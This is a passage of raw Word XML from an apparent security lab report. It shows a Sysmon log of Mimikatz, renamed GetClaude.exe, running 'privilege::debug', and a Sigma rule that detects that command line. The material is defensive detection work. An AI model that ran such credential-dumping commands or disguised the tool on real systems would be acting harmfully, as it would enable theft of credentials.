          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Mimikatz Execution and Privilege Debug</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="6BF3EA08">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="90" w:hRule="atLeast"/>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55C7C24E">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Process Create:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B247357">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70331055">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image: C:\Users\saada\Downloads\GetClaude.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E446A95">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>User: SH-WIN10\saad</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0971FAC8">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IntegrityLevel: High</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C4C5007">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Command:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD41F7B">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GetClaude.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D4FC35">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B3C3EBE">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mimikatz Commands:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01465893">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="36C2ADD5">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>privilege::debug</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B827C5B">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Result: Privilege 20 OK</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="716B99AC">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D6091E1">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysmon Evidence:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F68245">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Event ID 1 — Process Create</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721F2DDD">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6601D42C">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Technique:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24788246">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1003 — OS Credential Dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E5DBA36">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sigma 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Mimikatz / privilege::debug Detection (Mapped Phase: Phase 7)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Severity: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A6703">
      <w:pPr>
        <w:pStyle w:val="3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This rule detects the execution of Mimikatz or the use of the privilege::debug command pattern associated with credential-access activity. In the lab, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">Mimikatz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">was retrieved as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and saved as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>GetClaude.exe.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The rule focuses on the executable name and command-line pattern rather than relying only on the specific downloaded filename.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="12"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="108" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10118"/>
      </w:tblGrid>
      <w:tr w14:paraId="77B8397E">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="108" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="108" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10118" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="334155" w:sz="8" w:space="0"/>
              <w:left w:val="single" w:color="334155" w:sz="8" w:space="0"/>
              <w:bottom w:val="single" w:color="334155" w:sz="8" w:space="0"/>
              <w:right w:val="single" w:color="334155" w:sz="8" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0B1324"/>
          </w:tcPr>
          <w:p w14:paraId="75C3E022">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>title: Mimikatz or Debug Privilege Invocation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609EE7ED">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>status: test</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BDA3CB7">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>logsource:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3927908A">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category: process_creation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D368104">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product: windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E263111">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>detection:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B7867D">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selection:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="450462B0">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CommandLine|contains:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EB6BAA1">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 'privilege::debug'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C484097">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 'mimikatz'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D140804">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condition: selection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20DA0AA7">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>level: high</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FDF627D">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tags:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60787C6A">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  - attack.credential_access</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC08ACB">
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="228" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E2E8F0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  - attack.t1003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="639C131A">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0581318E">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C12AEB">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767323AC">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E83AD18">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE0BB8C">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE4904E">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3CA4F4">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CB78D6">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08336C4F">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0865D1F1">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CA13176">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59709245">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="238DEF4D">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C103AF0">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BC2486">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0EEF5E">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="299F469E">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED6E5DF">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D14678F">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
